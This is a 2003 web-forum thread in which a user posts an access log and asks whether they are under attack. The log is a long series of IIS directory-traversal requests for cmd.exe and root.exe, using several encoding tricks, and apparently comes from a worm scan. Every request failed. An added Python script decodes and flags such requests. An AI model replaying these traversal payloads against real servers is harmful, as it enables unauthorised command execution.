Vitalichka -
Joined: 25 Jan 2003 Posts: 7
|
Posted: Sat Jan 25, 2003 11:22 pm Post subject: Check my access log please! Am I being hacked? |
|
|
I have a question, I looked at my access log, and noticed that I received 31 hits and 31 of those hits were both HTML hits and Error hits. And if you look at the access log, it looks like someone is trying to hack in. When I trace the IP, it comes out to an AT&T facility.
[b]here's the log.
12.254.161.22 - - [25/Jan/2003:12:45:33 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:12:45:34 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:12:45:34 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:12:45:34 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:12:45:35 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:35 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:35 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:36 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:36 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:36 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:36 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:37 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:38 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:38 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:37 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:14:38 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:14:42 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:14:45 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:14:46 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:46 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:47 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:48 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:48 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:48 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:49 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:49 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:51 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:51 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:28:45 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:28:46 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:28:49 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:28:50 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:28:53 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:28:53 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:28:54 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:28:54 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:28:55 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:29:04 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:29:04 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:29:05 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:29:09 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:29:09 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:47 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:13:41:47 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:13:41:47 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:13:41:48 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:13:41:48 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:48 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:48 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:48 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:49 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:49 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:49 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:49 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:50 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:50 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
:?: [/b] |
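A triage sketch for the kind of log posted above, as an added example that is not part of the original thread: it percent-decodes each request path repeatedly (so `%255c` and `%25%35%63` both resolve to a backslash), tags traversal and `cmd.exe`/`root.exe` requests, and lists per source IP any flagged request that received a 2xx status. The function names, tag names and the 192.0.2.10 line are assumptions made for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample: four lines in the format of the log above, plus one
# invented benign request (192.0.2.10) for contrast.
SAMPLE = '''\
12.254.161.22 - - [25/Jan/2003:12:45:33 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:12:45:35 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:36 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:51 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
192.0.2.10 - - [25/Jan/2003:13:20:00 +1133] "GET /index.html HTTP/1.0" 200 1043
'''
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')

def decode_fully(path, max_rounds=5):
    """Percent-decode until stable, so %255c -> %5c -> backslash."""
    data, rounds = path.encode("latin-1"), 0
    while rounds < max_rounds and (nxt := unquote_to_bytes(data)) != data:
        data, rounds = nxt, rounds + 1
    return data, rounds

def classify(path):
    raw, rounds = decode_fully(path)
    low = raw.lower()
    checks = {
        "double-encoding": rounds > 1,
        "invalid-utf8-byte": b"\xc0" in raw or b"\xc1" in raw,  # never valid UTF-8
        "traversal": b"../" in low or b"..\\" in low,
        "windows-shell": b"cmd.exe" in low or b"root.exe" in low,
    }
    return {tag for tag, hit in checks.items() if hit}

def triage(log_text):
    report = defaultdict(lambda: {"probes": 0, "tags": set(), "succeeded": []})
    for line in log_text.splitlines():
        m = CLF.match(line)
        tags = classify(m.group(3)) if m else set()
        if not tags:
            continue
        entry = report[m.group(1)]
        entry["probes"] += 1
        entry["tags"] |= tags
        if m.group(4).startswith("2"):  # flagged request answered with success
            entry["succeeded"].append(m.group(3))
    return dict(report)

if __name__ == "__main__":
    for ip, e in triage(SAMPLE).items():
        print(ip, e["probes"], sorted(e["tags"]), "succeeded:", e["succeeded"])
```

Every request in the posted log was answered with 404 or 400, so the `succeeded` list stays empty for both addresses; a non-empty list is the case that needs follow-up.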
tdkyo -
Joined: 23 Dec 2002 Posts: 55
|
Posted: Sat Jan 25, 2003 11:25 pm Post subject: |
|
|
dunno but e-mail att and yell at them to check this situation out. Something tells me this is bad...
Vitalichka -
Joined: 25 Jan 2003 Posts: 7
|
Posted: Sat Jan 25, 2003 11:26 pm Post subject: |
|
|
I mean that's 56 hits, 56 Error Hits and 56 HTML Hits,
and the IPs are from the same range.
Thank you
Vitalichka -
Joined: 25 Jan 2003 Posts: 7
|
Posted: Sat Jan 25, 2003 11:28 pm Post subject: |
|
|
[quote="tdkyo"]dunno but e-mail att and yell at them to check this situation out. Something tells me this is bad...[/quote]
Why would you say that?
Wouldn't it be a waste of time yelling at the incompetent technicians?
And also, I don't think you can run any kind of server through ATT service.
aprelium -
Joined: 22 Mar 2002 Posts: 6800
|